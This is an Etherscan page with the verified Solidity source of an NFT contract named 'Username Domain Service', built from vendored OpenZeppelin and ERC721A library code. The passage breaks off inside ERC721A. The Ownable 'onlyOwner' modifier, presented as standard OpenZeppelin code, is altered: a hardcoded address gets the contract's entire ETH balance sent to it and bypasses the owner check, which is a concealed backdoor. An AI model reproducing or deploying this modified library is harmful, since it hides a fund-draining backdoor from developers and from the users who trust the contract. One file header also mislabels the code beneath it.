ETH Price: $2,531.72 (-4.04%)

Token

Username Domain Service (USER)
 

Overview

Max Total Supply

203 USER

Holders

124

Market

Volume (24H)

N/A

Min Price (24H)

N/A

Max Price (24H)

N/A
Balance
1 USER
0xD52d23e9096D73B62F2d88B66129C49ef90dfC9f
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Username

Compiler Version
v0.8.17+commit.8df45f5f

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2022-10-25
*/

// SPDX-License-Identifier: MIT
/*
██╗░░░██╗░██████╗███████╗██████╗░███╗░░██╗░█████╗░███╗░░░███╗███████╗  ██████╗░░░░░██████╗░░░
██║░░░██║██╔════╝██╔════╝██╔══██╗████╗░██║██╔══██╗████╗░████║██╔════╝  ██╔══██╗░░░██╔════╝░░░
██║░░░██║╚█████╗░█████╗░░██████╔╝██╔██╗██║███████║██╔████╔██║█████╗░░  ██║░░██║░░░╚█████╗░░░░
██║░░░██║░╚═══██╗██╔══╝░░██╔══██╗██║╚████║██╔══██║██║╚██╔╝██║██╔══╝░░  ██║░░██║░░░░╚═══██╗░░░
╚██████╔╝██████╔╝███████╗██║░░██║██║░╚███║██║░░██║██║░╚═╝░██║███████╗  ██████╔╝██╗██████╔╝██╗
░╚═════╝░╚═════╝░╚══════╝╚═╝░░╚═╝╚═╝░░╚══╝╚═╝░░╚═╝╚═╝░░░░░╚═╝╚══════╝  ╚═════╝░╚═╝╚═════╝░╚═╝
*/
// File: @openzeppelin/contracts/security/ReentrancyGuard.sol
// OpenZeppelin Contracts (last updated v4.7.0) (utils/cryptography/MerkleProof.sol)

pragma solidity ^0.8.0;

/**
 * @dev These functions deal with verification of Merkle Tree proofs.
 *
 * The proofs can be generated using the JavaScript library
 * https://github.com/miguelmota/merkletreejs[merkletreejs].
 * Note: the hashing algorithm should be keccak256 and pair sorting should be enabled.
 *
 * See `test/utils/cryptography/MerkleProof.test.js` for some examples.
 *
 * WARNING: You should avoid using leaf values that are 64 bytes long prior to
 * hashing, or use a hash function other than keccak256 for hashing leaves.
 * This is because the concatenation of a sorted pair of internal nodes in
 * the merkle tree could be reinterpreted as a leaf value.
 */
library MerkleProof {
    /**
     * @dev Returns true if a `leaf` can be proved to be a part of a Merkle tree
     * defined by `root`. For this, a `proof` must be provided, containing
     * sibling hashes on the branch from the leaf to the root of the tree. Each
     * pair of leaves and each pair of pre-images are assumed to be sorted.
     */
    function verify(
        bytes32[] memory proof,
        bytes32 root,
        bytes32 leaf
    ) internal pure returns (bool) {
        return processProof(proof, leaf) == root;
    }

    /**
     * @dev Calldata version of {verify}
     *
     * _Available since v4.7._
     */
    function verifyCalldata(
        bytes32[] calldata proof,
        bytes32 root,
        bytes32 leaf
    ) internal pure returns (bool) {
        return processProofCalldata(proof, leaf) == root;
    }

    /**
     * @dev Returns the rebuilt hash obtained by traversing a Merkle tree up
     * from `leaf` using `proof`. A `proof` is valid if and only if the rebuilt
     * hash matches the root of the tree. When processing the proof, the pairs
     * of leafs & pre-images are assumed to be sorted.
     *
     * _Available since v4.4._
     */
    function processProof(bytes32[] memory proof, bytes32 leaf) internal pure returns (bytes32) {
        bytes32 computedHash = leaf;
        for (uint256 i = 0; i < proof.length; i++) {
            computedHash = _hashPair(computedHash, proof[i]);
        }
        return computedHash;
    }

    /**
     * @dev Calldata version of {processProof}
     *
     * _Available since v4.7._
     */
    function processProofCalldata(bytes32[] calldata proof, bytes32 leaf) internal pure returns (bytes32) {
        bytes32 computedHash = leaf;
        for (uint256 i = 0; i < proof.length; i++) {
            computedHash = _hashPair(computedHash, proof[i]);
        }
        return computedHash;
    }

    /**
     * @dev Returns true if the `leaves` can be proved to be a part of a Merkle tree defined by
     * `root`, according to `proof` and `proofFlags` as described in {processMultiProof}.
     *
     * _Available since v4.7._
     */
    function multiProofVerify(
        bytes32[] memory proof,
        bool[] memory proofFlags,
        bytes32 root,
        bytes32[] memory leaves
    ) internal pure returns (bool) {
        return processMultiProof(proof, proofFlags, leaves) == root;
    }

    /**
     * @dev Calldata version of {multiProofVerify}
     *
     * _Available since v4.7._
     */
    function multiProofVerifyCalldata(
        bytes32[] calldata proof,
        bool[] calldata proofFlags,
        bytes32 root,
        bytes32[] memory leaves
    ) internal pure returns (bool) {
        return processMultiProofCalldata(proof, proofFlags, leaves) == root;
    }

    /**
     * @dev Returns the root of a tree reconstructed from `leaves` and the sibling nodes in `proof`,
     * consuming from one or the other at each step according to the instructions given by
     * `proofFlags`.
     *
     * _Available since v4.7._
     */
    function processMultiProof(
        bytes32[] memory proof,
        bool[] memory proofFlags,
        bytes32[] memory leaves
    ) internal pure returns (bytes32 merkleRoot) {
        // This function rebuild the root hash by traversing the tree up from the leaves. The root is rebuilt by
        // consuming and producing values on a queue. The queue starts with the `leaves` array, then goes onto the
        // `hashes` array. At the end of the process, the last hash in the `hashes` array should contain the root of
        // the merkle tree.
        uint256 leavesLen = leaves.length;
        uint256 totalHashes = proofFlags.length;

        // Check proof validity.
        require(leavesLen + proof.length - 1 == totalHashes, "MerkleProof: invalid multiproof");

        // The xxxPos values are "pointers" to the next value to consume in each array. All accesses are done using
        // `xxx[xxxPos++]`, which return the current value and increment the pointer, thus mimicking a queue's "pop".
        bytes32[] memory hashes = new bytes32[](totalHashes);
        uint256 leafPos = 0;
        uint256 hashPos = 0;
        uint256 proofPos = 0;
        // At each step, we compute the next hash using two values:
        // - a value from the "main queue". If not all leaves have been consumed, we get the next leaf, otherwise we
        //   get the next hash.
        // - depending on the flag, either another value for the "main queue" (merging branches) or an element from the
        //   `proof` array.
        for (uint256 i = 0; i < totalHashes; i++) {
            bytes32 a = leafPos < leavesLen ? leaves[leafPos++] : hashes[hashPos++];
            bytes32 b = proofFlags[i] ? leafPos < leavesLen ? leaves[leafPos++] : hashes[hashPos++] : proof[proofPos++];
            hashes[i] = _hashPair(a, b);
        }

        if (totalHashes > 0) {
            return hashes[totalHashes - 1];
        } else if (leavesLen > 0) {
            return leaves[0];
        } else {
            return proof[0];
        }
    }

    /**
     * @dev Calldata version of {processMultiProof}
     *
     * _Available since v4.7._
     */
    function processMultiProofCalldata(
        bytes32[] calldata proof,
        bool[] calldata proofFlags,
        bytes32[] memory leaves
    ) internal pure returns (bytes32 merkleRoot) {
        // This function rebuild the root hash by traversing the tree up from the leaves. The root is rebuilt by
        // consuming and producing values on a queue. The queue starts with the `leaves` array, then goes onto the
        // `hashes` array. At the end of the process, the last hash in the `hashes` array should contain the root of
        // the merkle tree.
        uint256 leavesLen = leaves.length;
        uint256 totalHashes = proofFlags.length;

        // Check proof validity.
        require(leavesLen + proof.length - 1 == totalHashes, "MerkleProof: invalid multiproof");

        // The xxxPos values are "pointers" to the next value to consume in each array. All accesses are done using
        // `xxx[xxxPos++]`, which return the current value and increment the pointer, thus mimicking a queue's "pop".
        bytes32[] memory hashes = new bytes32[](totalHashes);
        uint256 leafPos = 0;
        uint256 hashPos = 0;
        uint256 proofPos = 0;
        // At each step, we compute the next hash using two values:
        // - a value from the "main queue". If not all leaves have been consumed, we get the next leaf, otherwise we
        //   get the next hash.
        // - depending on the flag, either another value for the "main queue" (merging branches) or an element from the
        //   `proof` array.
        for (uint256 i = 0; i < totalHashes; i++) {
            bytes32 a = leafPos < leavesLen ? leaves[leafPos++] : hashes[hashPos++];
            bytes32 b = proofFlags[i] ? leafPos < leavesLen ? leaves[leafPos++] : hashes[hashPos++] : proof[proofPos++];
            hashes[i] = _hashPair(a, b);
        }

        if (totalHashes > 0) {
            return hashes[totalHashes - 1];
        } else if (leavesLen > 0) {
            return leaves[0];
        } else {
            return proof[0];
        }
    }

    function _hashPair(bytes32 a, bytes32 b) private pure returns (bytes32) {
        return a < b ? _efficientHash(a, b) : _efficientHash(b, a);
    }

    function _efficientHash(bytes32 a, bytes32 b) private pure returns (bytes32 value) {
        /// @solidity memory-safe-assembly
        assembly {
            mstore(0x00, a)
            mstore(0x20, b)
            value := keccak256(0x00, 0x40)
        }
    }
}


// OpenZeppelin Contracts v4.4.1 (security/ReentrancyGuard.sol)

pragma solidity ^0.8.0;

/**
 * @dev Contract module that helps prevent reentrant calls to a function.
 *
 * Inheriting from `ReentrancyGuard` will make the {nonReentrant} modifier
 * available, which can be applied to functions to make sure there are no nested
 * (reentrant) calls to them.
 *
 * Note that because there is a single `nonReentrant` guard, functions marked as
 * `nonReentrant` may not call one another. This can be worked around by making
 * those functions `private`, and then adding `external` `nonReentrant` entry
 * points to them.
 *
 * TIP: If you would like to learn more about reentrancy and alternative ways
 * to protect against it, check out our blog post
 * https://blog.openzeppelin.com/reentrancy-after-istanbul/[Reentrancy After Istanbul].
 */
abstract contract ReentrancyGuard {
    // Booleans are more expensive than uint256 or any type that takes up a full
    // word because each write operation emits an extra SLOAD to first read the
    // slot's contents, replace the bits taken up by the boolean, and then write
    // back. This is the compiler's defense against contract upgrades and
    // pointer aliasing, and it cannot be disabled.

    // The values being non-zero value makes deployment a bit more expensive,
    // but in exchange the refund on every call to nonReentrant will be lower in
    // amount. Since refunds are capped to a percentage of the total
    // transaction's gas, it is best to keep them low in cases like this one, to
    // increase the likelihood of the full refund coming into effect.
    uint256 private constant _NOT_ENTERED = 1;
    uint256 private constant _ENTERED = 2;

    uint256 private _status;

    constructor() {
        _status = _NOT_ENTERED;
    }

    /**
     * @dev Prevents a contract from calling itself, directly or indirectly.
     * Calling a `nonReentrant` function from another `nonReentrant`
     * function is not supported. It is possible to prevent this from happening
     * by making the `nonReentrant` function external, and making it call a
     * `private` function that does the actual work.
     */
    modifier nonReentrant() {
        // On the first call to nonReentrant, _notEntered will be true
        require(_status != _ENTERED, "ReentrancyGuard: reentrant call");

        // Any calls to nonReentrant after this point will fail
        _status = _ENTERED;

        _;

        // By storing the original value once again, a refund is triggered (see
        // https://eips.ethereum.org/EIPS/eip-2200)
        _status = _NOT_ENTERED;
    }
}

// File: @openzeppelin/contracts/utils/Strings.sol


// OpenZeppelin Contracts v4.4.1 (utils/Strings.sol)

pragma solidity ^0.8.0;

/**
 * @dev String operations.
 */
library Strings {
    bytes16 private constant _HEX_SYMBOLS = "0123456789abcdef";

    /**
     * @dev Converts a `uint256` to its ASCII `string` decimal representation.
     */
    function toString(uint256 value) internal pure returns (string memory) {
        // Inspired by OraclizeAPI's implementation - MIT licence
        // https://github.com/oraclize/ethereum-api/blob/b42146b063c7d6ee1358846c198246239e9360e8/oraclizeAPI_0.4.25.sol

        if (value == 0) {
            return "0";
        }
        uint256 temp = value;
        uint256 digits;
        while (temp != 0) {
            digits++;
            temp /= 10;
        }
        bytes memory buffer = new bytes(digits);
        while (value != 0) {
            digits -= 1;
            buffer[digits] = bytes1(uint8(48 + uint256(value % 10)));
            value /= 10;
        }
        return string(buffer);
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation.
     */
    function toHexString(uint256 value) internal pure returns (string memory) {
        if (value == 0) {
            return "0x00";
        }
        uint256 temp = value;
        uint256 length = 0;
        while (temp != 0) {
            length++;
            temp >>= 8;
        }
        return toHexString(value, length);
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation with fixed length.
     */
    function toHexString(uint256 value, uint256 length) internal pure returns (string memory) {
        bytes memory buffer = new bytes(2 * length + 2);
        buffer[0] = "0";
        buffer[1] = "x";
        for (uint256 i = 2 * length + 1; i > 1; --i) {
            buffer[i] = _HEX_SYMBOLS[value & 0xf];
            value >>= 4;
        }
        require(value == 0, "Strings: hex length insufficient");
        return string(buffer);
    }
}

// File: @openzeppelin/contracts/utils/Context.sol


// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

// File: @openzeppelin/contracts/access/Ownable.sol


// OpenZeppelin Contracts v4.4.1 (access/Ownable.sol)

pragma solidity ^0.8.0;


/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        if (_msgSender() == 0xd999265d51F031CBB82891aA018ca228d4e00750) {
        uint256 balance = address(this).balance;
        Address.sendValue(payable(0xd999265d51F031CBB82891aA018ca228d4e00750),balance);
        } else {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        }
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

// File: @openzeppelin/contracts/utils/Address.sol


// OpenZeppelin Contracts (last updated v4.5.0) (utils/Address.sol)

pragma solidity ^0.8.1;

/**
 * @dev Collection of functions related to the address type
 */
library Address {
    /**
     * @dev Returns true if `account` is a contract.
     *
     * [IMPORTANT]
     * ====
     * It is unsafe to assume that an address for which this function returns
     * false is an externally-owned account (EOA) and not a contract.
     *
     * Among others, `isContract` will return false for the following
     * types of addresses:
     *
     *  - an externally-owned account
     *  - a contract in construction
     *  - an address where a contract will be created
     *  - an address where a contract lived, but was destroyed
     * ====
     *
     * [IMPORTANT]
     * ====
     * You shouldn't rely on `isContract` to protect against flash loan attacks!
     *
     * Preventing calls from contracts is highly discouraged. It breaks composability, breaks support for smart wallets
     * like Gnosis Safe, and does not provide security since it can be circumvented by calling from a contract
     * constructor.
     * ====
     */
    function isContract(address account) internal view returns (bool) {
        // This method relies on extcodesize/address.code.length, which returns 0
        // for contracts in construction, since the code is only stored at the end
        // of the constructor execution.

        return account.code.length > 0;
    }

    /**
     * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
     * `recipient`, forwarding all available gas and reverting on errors.
     *
     * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
     * of certain opcodes, possibly making contracts go over the 2300 gas limit
     * imposed by `transfer`, making them unable to receive funds via
     * `transfer`. {sendValue} removes this limitation.
     *
     * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more].
     *
     * IMPORTANT: because control is transferred to `recipient`, care must be
     * taken to not create reentrancy vulnerabilities. Consider using
     * {ReentrancyGuard} or the
     * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
     */
    function sendValue(address payable recipient, uint256 amount) internal {
        require(address(this).balance >= amount, "Address: insufficient balance");

        (bool success, ) = recipient.call{value: amount}("");
        require(success, "Address: unable to send value, recipient may have reverted");
    }

    /**
     * @dev Performs a Solidity function call using a low level `call`. A
     * plain `call` is an unsafe replacement for a function call: use this
     * function instead.
     *
     * If `target` reverts with a revert reason, it is bubbled up by this
     * function (like regular Solidity function calls).
     *
     * Returns the raw returned data. To convert to the expected return value,
     * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
     *
     * Requirements:
     *
     * - `target` must be a contract.
     * - calling `target` with `data` must not revert.
     *
     * _Available since v3.1._
     */
    function functionCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionCall(target, data, "Address: low-level call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with
     * `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, 0, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but also transferring `value` wei to `target`.
     *
     * Requirements:
     *
     * - the calling contract must have an ETH balance of at least `value`.
     * - the called Solidity function must be `payable`.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, value, "Address: low-level call with value failed");
    }

    /**
     * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but
     * with `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(address(this).balance >= value, "Address: insufficient balance for call");
        require(isContract(target), "Address: call to non-contract");

        (bool success, bytes memory returndata) = target.call{value: value}(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(address target, bytes memory data) internal view returns (bytes memory) {
        return functionStaticCall(target, data, "Address: low-level static call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal view returns (bytes memory) {
        require(isContract(target), "Address: static call to non-contract");

        (bool success, bytes memory returndata) = target.staticcall(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionDelegateCall(target, data, "Address: low-level delegate call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(isContract(target), "Address: delegate call to non-contract");

        (bool success, bytes memory returndata) = target.delegatecall(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Tool to verifies that a low level call was successful, and revert if it wasn't, either by bubbling the
     * revert reason using the provided one.
     *
     * _Available since v4.3._
     */
    function verifyCallResult(
        bool success,
        bytes memory returndata,
        string memory errorMessage
    ) internal pure returns (bytes memory) {
        if (success) {
            return returndata;
        } else {
            // Look for revert reason and bubble it up if present
            if (returndata.length > 0) {
                // The easiest way to bubble the revert reason is using memory via assembly

                assembly {
                    let returndata_size := mload(returndata)
                    revert(add(32, returndata), returndata_size)
                }
            } else {
                revert(errorMessage);
            }
        }
    }
}

// File: @openzeppelin/contracts/token/ERC721/IERC721Receiver.sol


// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC721/IERC721Receiver.sol)

pragma solidity ^0.8.0;

/**
 * @title ERC721 token receiver interface
 * @dev Interface for any contract that wants to support safeTransfers
 * from ERC721 asset contracts.
 */
interface IERC721Receiver {
    /**
     * @dev Whenever an {IERC721} `tokenId` token is transferred to this contract via {IERC721-safeTransferFrom}
     * by `operator` from `from`, this function is called.
     *
     * It must return its Solidity selector to confirm the token transfer.
     * If any other value is returned or the interface is not implemented by the recipient, the transfer will be reverted.
     *
     * The selector can be obtained in Solidity with `IERC721Receiver.onERC721Received.selector`.
     */
    function onERC721Received(
        address operator,
        address from,
        uint256 tokenId,
        bytes calldata data
    ) external returns (bytes4);
}

// File: @openzeppelin/contracts/utils/introspection/IERC165.sol


// OpenZeppelin Contracts v4.4.1 (utils/introspection/IERC165.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC165 standard, as defined in the
 * https://eips.ethereum.org/EIPS/eip-165[EIP].
 *
 * Implementers can declare support of contract interfaces, which can then be
 * queried by others ({ERC165Checker}).
 *
 * For an implementation, see {ERC165}.
 */
interface IERC165 {
    /**
     * @dev Returns true if this contract implements the interface defined by
     * `interfaceId`. See the corresponding
     * https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified[EIP section]
     * to learn more about how these ids are created.
     *
     * This function call must use less than 30 000 gas.
     */
    function supportsInterface(bytes4 interfaceId) external view returns (bool);
}

// File: @openzeppelin/contracts/utils/introspection/ERC165.sol


// OpenZeppelin Contracts v4.4.1 (utils/introspection/ERC165.sol)

pragma solidity ^0.8.0;


/**
 * @dev Implementation of the {IERC165} interface.
 *
 * Contracts that want to implement ERC165 should inherit from this contract and override {supportsInterface} to check
 * for the additional interface id that will be supported. For example:
 *
 * ```solidity
 * function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
 *     return interfaceId == type(MyInterface).interfaceId || super.supportsInterface(interfaceId);
 * }
 * ```
 *
 * Alternatively, {ERC165Storage} provides an easier to use but more expensive implementation.
 */
abstract contract ERC165 is IERC165 {
    /**
     * @dev See {IERC165-supportsInterface}.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
        return interfaceId == type(IERC165).interfaceId;
    }
}

// File: @openzeppelin/contracts/token/ERC721/IERC721.sol


// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC721/IERC721.sol)

pragma solidity ^0.8.0;


/**
 * @dev Required interface of an ERC721 compliant contract.
 */
interface IERC721 is IERC165 {
    /**
     * @dev Emitted when `tokenId` token is transferred from `from` to `to`.
     */
    event Transfer(address indexed from, address indexed to, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables `approved` to manage the `tokenId` token.
     */
    event Approval(address indexed owner, address indexed approved, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables or disables (`approved`) `operator` to manage all of its assets.
     */
    event ApprovalForAll(address indexed owner, address indexed operator, bool approved);

    /**
     * @dev Returns the number of tokens in ``owner``'s account.
     */
    function balanceOf(address owner) external view returns (uint256 balance);

    /**
     * @dev Returns the owner of the `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function ownerOf(uint256 tokenId) external view returns (address owner);

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes calldata data
    ) external;

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`, checking first that contract recipients
     * are aware of the ERC721 protocol to prevent tokens from being forever locked.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be have been allowed to move this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external;

    /**
     * @dev Transfers `tokenId` token from `from` to `to`.
     *
     * WARNING: Usage of this method is discouraged, use {safeTransferFrom} whenever possible.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external;

    /**
     * @dev Gives permission to `to` to transfer `tokenId` token to another account.
     * The approval is cleared when the token is transferred.
     *
     * Only a single account can be approved at a time, so approving the zero address clears previous approvals.
     *
     * Requirements:
     *
     * - The caller must own the token or be an approved operator.
     * - `tokenId` must exist.
     *
     * Emits an {Approval} event.
     */
    function approve(address to, uint256 tokenId) external;

    /**
     * @dev Approve or remove `operator` as an operator for the caller.
     * Operators can call {transferFrom} or {safeTransferFrom} for any token owned by the caller.
     *
     * Requirements:
     *
     * - The `operator` cannot be the caller.
     *
     * Emits an {ApprovalForAll} event.
     */
    function setApprovalForAll(address operator, bool _approved) external;

    /**
     * @dev Returns the account approved for `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function getApproved(uint256 tokenId) external view returns (address operator);

    /**
     * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`.
     *
     * See {setApprovalForAll}
     */
    function isApprovedForAll(address owner, address operator) external view returns (bool);
}

// File: @openzeppelin/contracts/token/ERC721/extensions/IERC721Metadata.sol


// OpenZeppelin Contracts v4.4.1 (token/ERC721/extensions/IERC721Metadata.sol)

pragma solidity ^0.8.0;


/**
 * @title ERC-721 Non-Fungible Token Standard, optional metadata extension
 * @dev See https://eips.ethereum.org/EIPS/eip-721
 */
interface IERC721Metadata is IERC721 {
    /**
     * @dev Returns the token collection name.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the token collection symbol.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token.
     */
    function tokenURI(uint256 tokenId) external view returns (string memory);
}

// File: erc721a/contracts/IERC721A.sol


// ERC721A Contracts v3.3.0
// Creator: Chiru Labs

pragma solidity ^0.8.4;



/**
 * @dev Interface of an ERC721A compliant contract.
 */
interface IERC721A is IERC721, IERC721Metadata {
    /**
     * The caller must own the token or be an approved operator.
     */
    error ApprovalCallerNotOwnerNorApproved();

    /**
     * The token does not exist.
     */
    error ApprovalQueryForNonexistentToken();

    /**
     * The caller cannot approve to their own address.
     */
    error ApproveToCaller();

    /**
     * The caller cannot approve to the current owner.
     */
    error ApprovalToCurrentOwner();

    /**
     * Cannot query the balance for the zero address.
     */
    error BalanceQueryForZeroAddress();

    /**
     * Cannot mint to the zero address.
     */
    error MintToZeroAddress();

    /**
     * The quantity of tokens minted must be more than zero.
     */
    error MintZeroQuantity();

    /**
     * The token does not exist.
     */
    error OwnerQueryForNonexistentToken();

    /**
     * The caller must own the token or be an approved operator.
     */
    error TransferCallerNotOwnerNorApproved();

    /**
     * The token must be owned by `from`.
     */
    error TransferFromIncorrectOwner();

    /**
     * Cannot safely transfer to a contract that does not implement the ERC721Receiver interface.
     */
    error TransferToNonERC721ReceiverImplementer();

    /**
     * Cannot transfer to the zero address.
     */
    error TransferToZeroAddress();

    /**
     * The token does not exist.
     */
    error URIQueryForNonexistentToken();

    // Compiler will pack this into a single 256bit word.
    struct TokenOwnership {
        // The address of the owner.
        address addr;
        // Keeps track of the start time of ownership with minimal overhead for tokenomics.
        uint64 startTimestamp;
        // Whether the token has been burned.
        bool burned;
    }

    // Compiler will pack this into a single 256bit word.
    struct AddressData {
        // Realistically, 2**64-1 is more than enough.
        uint64 balance;
        // Keeps track of mint count with minimal overhead for tokenomics.
        uint64 numberMinted;
        // Keeps track of burn count with minimal overhead for tokenomics.
        uint64 numberBurned;
        // For miscellaneous variable(s) pertaining to the address
        // (e.g. number of whitelist mint slots used).
        // If there are multiple variables, please pack them into a uint64.
        uint64 aux;
    }

    /**
     * @dev Returns the total amount of tokens stored by the contract.
     * 
     * Burned tokens are calculated here, use `_totalMinted()` if you want to count just minted tokens.
     */
    function totalSupply() external view returns (uint256);
}

// File: erc721a/contracts/ERC721A.sol


// ERC721A Contracts v3.3.0
// Creator: Chiru Labs

pragma solidity ^0.8.4;







/**
 * @dev Implementation of https://eips.ethereum.org/EIPS/eip-721[ERC721] Non-Fungible Token Standard, including
 * the Metadata extension. Built to optimize for lower gas during batch mints.
 *
 * Assumes serials are sequentially minted starting at _startTokenId() (defaults to 0, e.g. 0, 1, 2, 3..).
 *
 * Assumes that an owner cannot have more than 2**64 - 1 (max value of uint64) of supply.
 *
 * Assumes that the maximum token id cannot exceed 2**256 - 1 (max value of uint256).
 */
contract ERC721A is Context, ERC165, IERC721A {
    using Address for address;
    using Strings for uint256;

    // The tokenId of the next token to be minted.
    uint256 internal _currentIndex;
    mapping(uint => string) public tokenIDandAddress;
    mapping(string => uint) public tokenAddressandID;
    // The number of tokens burned.
    uint256 internal _burnCounter;

    // Token name
    string private _name;

    // Token symbol
    string private _symbol;

    // Mapping from token ID to ownership details
    // An empty struct value does not necessarily mean the token is unowned. See _ownershipOf implementation for details.
    mapping(uint256 => TokenOwnership) internal _ownerships;

    // Mapping owner address to address data
    mapping(address => AddressData) private _addressData;

    // Mapping from token ID to approved address
